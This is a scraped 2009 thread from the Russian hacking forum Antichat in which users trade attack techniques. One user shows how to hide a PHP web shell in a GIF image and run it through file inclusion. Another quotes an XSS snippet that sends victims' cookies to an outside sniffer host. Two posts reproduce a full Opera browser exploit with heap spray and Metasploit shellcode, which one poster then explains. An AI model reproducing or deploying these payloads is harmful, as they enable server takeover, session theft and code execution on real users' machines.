Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.07.2009, 11:41
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
|
|
|

09.07.2009, 12:50
|
|
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме: 404716
Репутация:
145
|
|
Сообщение от Ch3ck
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
через инклуд нужно ее подгружать
|
|
|

09.07.2009, 14:26
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
Сообщение от PaCo
Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.
я понял что написал,поздравляю что пощитал символы,глянул на глаз посколько в "<script>img=new Image(); img.src="http://сsite/snif/picture.gif"+document.cookie;</script>" будет на много больше символов,"твой снифер" я написал условно, да там куки не будет,но за то он смог бы перенаправлять юзеров на любые ресурсы в том числе и фэйки.
|
|
|

09.07.2009, 14:36
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Сообщение от $n@ke
Ershik, во первых не cals.exe, а calc.exe
и во вторых - может там полный путь надо или еще чо..
Ок.
Значение
Код:
var evil = "calc.exe";
-он воспринимает странно.
В адресной строке, после перезаполнения появляется следующее:
Код:
test.test.ru/calc.exeXXXXXXXXXXXXXXXXXXXXXXX
Сам эксплоит:
Код:
<html>
<head><title>uh?</title></head>
<body>
<script>
// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9
// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "calc.exe";
for(var i = 0; i<86438; i++)
evil += "X";
evil += "R.";
window.location.replace(evil);
</script>
</body>
</html>
|
|
|

09.07.2009, 15:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от Ershik
Ок.
Значение
Код:
var evil = "calc.exe";
-он воспринимает странно.
В адресной строке, после перезаполнения появляется следующее:
Код:
test.test.ru/calc.exeXXXXXXXXXXXXXXXXXXXXXXX
Сам эксплоит:
Код:
<html>
<head><title>uh?</title></head>
<body>
<script>
// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9
// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "calc.exe";
for(var i = 0; i<86438; i++)
evil += "X";
evil += "R.";
window.location.replace(evil);
</script>
</body>
</html>
насколько я понимаю в этих сплоитах(я понимаю не очень много)
evil используется только для того чтобы вылезти из памяти приложения, то есть вызвать переполнение/overflow.
сама же начинка лежит в переменной shellcode где и происходит вызов calc.exe
upd по коду обрати внимание на комментарии
особенно тут
Код:
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
Последний раз редактировалось geezer.code; 09.07.2009 в 15:58..
|
|
|

09.07.2009, 16:26
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от Ch3ck
Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
Сам тестил? У меня не пашет (.gif)
|
|
|

09.07.2009, 16:43
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
Сообщение от diznt
Сам тестил? У меня не пашет (.gif)
Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом.
З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.
Последний раз редактировалось PaCo; 09.07.2009 в 16:50..
Причина: надо спать побольше
|
|
|

09.07.2009, 16:59
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от PaCo
Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом.
З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.
Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт
не выполняеться код то значит не правильно что то делаешь с php кодом.
да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет
|
|
|

09.07.2009, 17:05
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме: 1754802
Репутация:
380
|
|
Сообщение от diznt
Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт
не выполняеться код то значит не правильно что то делаешь с php кодом.
да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет
Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.
Последний раз редактировалось PaCo; 09.07.2009 в 17:09..
|
|
|

09.07.2009, 17:58
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме: 6128108
Репутация:
445
|
|
Сообщение от PaCo
Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.
так я инклудил
(то есть в конце ставил <?php include("2.gif"); ?> 2.gif норм картинка в том же каталоге) но в итоге ничего не изменялось (вроде как)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|